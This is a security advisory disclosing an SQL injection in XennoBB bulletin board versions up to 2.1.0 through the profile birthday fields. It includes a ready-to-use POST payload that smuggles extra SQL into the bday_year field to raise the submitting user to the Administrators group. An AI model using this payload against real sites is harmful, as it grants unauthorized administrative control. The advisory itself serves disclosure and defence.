--------------------- SUMMARY ---------------------=0D
=0D
Name:=0D
XennoBB "birthday" SQL Injection (6/8/2006)=0D
=0D
Vendor / Product:=0D
XennoBB Group=0D
http://www.xennobb.com/=0D
=0D
Description:=0D
The world's most revolutionary and easy to use bulletin board.=0D
=0D
Revolutionary because it redefines the boundaries of usability=0D
and power; from the first version it's a real alternative to=0D
the commercial forums out there.=0D
=0D
How can XennoBB be described in few words? =0D
Lightning-speed, stable, SECURED(?) and modern.=0D
=0D
Version(s) Affected:=0D
<= 2.1.0=0D
=0D
Severity:=0D
High=0D
=0D
Impact:=0D
SQL Injection (Remote)=0D
=0D
Status:=0D
Unpatched=0D
=0D
Discovered by:=0D
Chris Boulton =0D
=0D
------------------- DESCRIPTION -------------------=0D
=0D
An exploit exists in the above mentioned versions of XennoBB which=0D
can be exploited by malicious users to conduct SQL injection attacks.=0D
=0D
Input passed to the "bday_day", "bday_month" and "bday_year form=0D
fields is not properly sanitised before being used in an SQL query.=0D
This exploit can lead to manipulation of SQL queries by injecting=0D
arbitary SQL code.=0D
=0D
--------------------- EXPLOIT ---------------------=0D
=0D
Submit a forged POST request to=0D
=0D
/profile.php?section=personal&id={your registered user ID here}=0D
=0D
With the following as the POST data:=0D
=0D
form_sent=1&form[sex]=a&bday_day=1&bday_month=2&bday_year=", group_id=1, birthday="=0D
=0D
Successful exploitation leads to the user group being changed to=0D
that of Administrators.